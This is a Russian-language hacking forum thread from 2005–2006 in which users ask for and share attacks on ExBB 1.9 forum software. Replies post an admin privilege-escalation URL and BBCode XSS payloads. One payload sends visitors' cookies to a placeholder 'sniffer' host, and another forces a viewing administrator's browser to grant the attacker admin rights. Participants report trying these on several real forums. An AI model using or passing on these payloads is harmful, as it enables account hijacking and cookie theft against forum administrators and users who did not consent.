ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос про уязвимости в ExBB 1.9
  #1  
Старый 30.12.2005, 23:57
Аватар для cardons
cardons
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159

Репутация: 950


По умолчанию Вопрос про уязвимости в ExBB 1.9

Какие у него есть Xss ошибки?Или сплойты.Дайте пжл
 
Ответить с цитированием

  #2  
Старый 31.12.2005, 00:44
Аватар для ZeroHour
ZeroHour
Познающий
Регистрация: 28.08.2005
Сообщений: 30
Провел на форуме:
181219

Репутация: 9
Отправить сообщение для ZeroHour с помощью ICQ
По умолчанию

вот тебе линки на видео -
раз
два

было еще, но щас уже его почуму-то нету=(
 
Ответить с цитированием

  #3  
Старый 31.12.2005, 01:11
Аватар для cardons
cardons
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159

Репутация: 950


По умолчанию

Нафиг мне видео или ты мне предлагаешь весь код который там вводили перепичатывать?
 
Ответить с цитированием

  #4  
Старый 02.01.2006, 13:15
Аватар для slime
slime
Познающий
Регистрация: 08.12.2005
Сообщений: 35
Провел на форуме:
133219

Репутация: -1
По умолчанию

Цитата:
Сообщение от cardons  
Нафиг мне видео или ты мне предлагаешь весь код который там вводили перепичатывать?
хы, чувак, сам себя лолишь...
почти ко всем видосам прилогается тхт файлик со всем что ты видел на экране в блокнотике ...
ыыыыыыыыыыыыы
 
Ответить с цитированием

  #5  
Старый 04.01.2006, 02:22
Аватар для cardons
cardons
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159

Репутация: 950


По умолчанию

Ну скачай тогда первое к примеру видео я посмортрю какой ты там файл найдешь.
 
Ответить с цитированием

  #6  
Старый 04.01.2006, 12:25
Аватар для slime
slime
Познающий
Регистрация: 08.12.2005
Сообщений: 35
Провел на форуме:
133219

Репутация: -1
По умолчанию

Цитата:
Сообщение от cardons  
Ну скачай тогда первое к примеру видео я посмортрю какой ты там файл найдешь.
а что ты тз того видео не наешь как сделать???
как из админки сделать себя админом..... хы.... можно скачать себе этот форум и сгенерить этот урл...

но если лень то пжалста...
Код:
setmembers.php?action=edit_user&checkaction=yes&userid=[Пишем сюда ID юзера]&membertitle=&emailaddress=bla@bla.ru&newname=[тут должно быть новое имя]&password=&homepage=&aolname=&icqnumber=&location=&interests=&signature=&doupload=on&numberofposts=666&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC
на сколько я помню те КСС-ы у мя не работали чего-то вот ксс который работает
Код:
email]'style='display:none;background:url(javascript:document.images[2].src="[сниффер]?"+document.cookie)[/email]
подправь ксс а то тут его подпортить немнного пришлось чтобы видно было... ну суть думаю понятна
 
Ответить с цитированием

  #7  
Старый 28.01.2006, 22:28
Аватар для dante
dante
Новичок
Регистрация: 28.01.2006
Сообщений: 3
Провел на форуме:
23336

Репутация: 0
По умолчанию

Второй КСС, что ты дал вроде бы работает, но когда я вставляю туда вместо сниффера+document.cookie урлу, которая должна сделать мну админом, она почему то не действует... Когда вообще этот КСС срабатывает?
 
Ответить с цитированием

  #8  
Старый 29.01.2006, 19:25
Аватар для slime
slime
Познающий
Регистрация: 08.12.2005
Сообщений: 35
Провел на форуме:
133219

Репутация: -1
По умолчанию

Цитата:
Сообщение от dante  
Второй КСС, что ты дал вроде бы работает, но когда я вставляю туда вместо сниффера+document.cookie урлу, которая должна сделать мну админом, она почему то не действует... Когда вообще этот КСС срабатывает?
ну типа надо подождать немножко, пока админ просмотрит сообщение... или если у админа картинки отключены ничего не получится... ну или у админа броузер ОПЕРА... для оперы надо немного переделать КСС...
Код:
[*email]'style=background:url("javascript:document.images[0].src='setmembers.php?action=edit_user&checkaction=yes&userid=[ID]&membertitle=&emailaddress=bla@bla.ru&newname=[ИМЯ]&password=&homepage=&aolname=&icqnumber=&location=&interests=&signature=&doupload=on&numberofposts=666&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC'");[/*email]
Вот это проверил -- работает... только свой ID поставь и ИМЯ. и про репу желательно помнить )
 
Ответить с цитированием

  #9  
Старый 30.01.2006, 21:21
Аватар для dante
dante
Новичок
Регистрация: 28.01.2006
Сообщений: 3
Провел на форуме:
23336

Репутация: 0
По умолчанию

slime, репу я те плюснул, но что-то непохоже чтоб твоя ксс-ка меня админом сделала... последняя вообще отображается, добавил display:none - перестала, но я эту урлу тестил на нескольких форумах, и что-то пока не админ.. в чем может быть дело, есть какие-то идейки? Может знаешь, где копать? Буду весьма признателен
 
Ответить с цитированием

  #10  
Старый 30.01.2006, 23:40
Аватар для Romaxa55
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
Провел на форуме:
584821

Репутация: 83
Отправить сообщение для Romaxa55 с помощью ICQ
По умолчанию

Парни, извините что в не тему, но вот сейчас проводил xss на ExBB 1.9.1 Снифер прошел хорошо, но дело в том, что хешь интересный, допустим пасс стоит 123456
хешь от него e10adc3949ba59abbe56e057f20f883e а приходит d41d8cd98f00b204e9800998ecf8427e , бред какойто, может кто подскажет, иль стукните в асю.
Я обычно в инвизбл сижу.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ExBB 1.9.1 . PHP-инклюдинг в админке и другие уязвимости. Егорыч+++ Комментарии к видео 7 25.12.2005 13:16
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Уязвимости чатов L@nd@R Чаты 4 03.04.2005 05:12



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ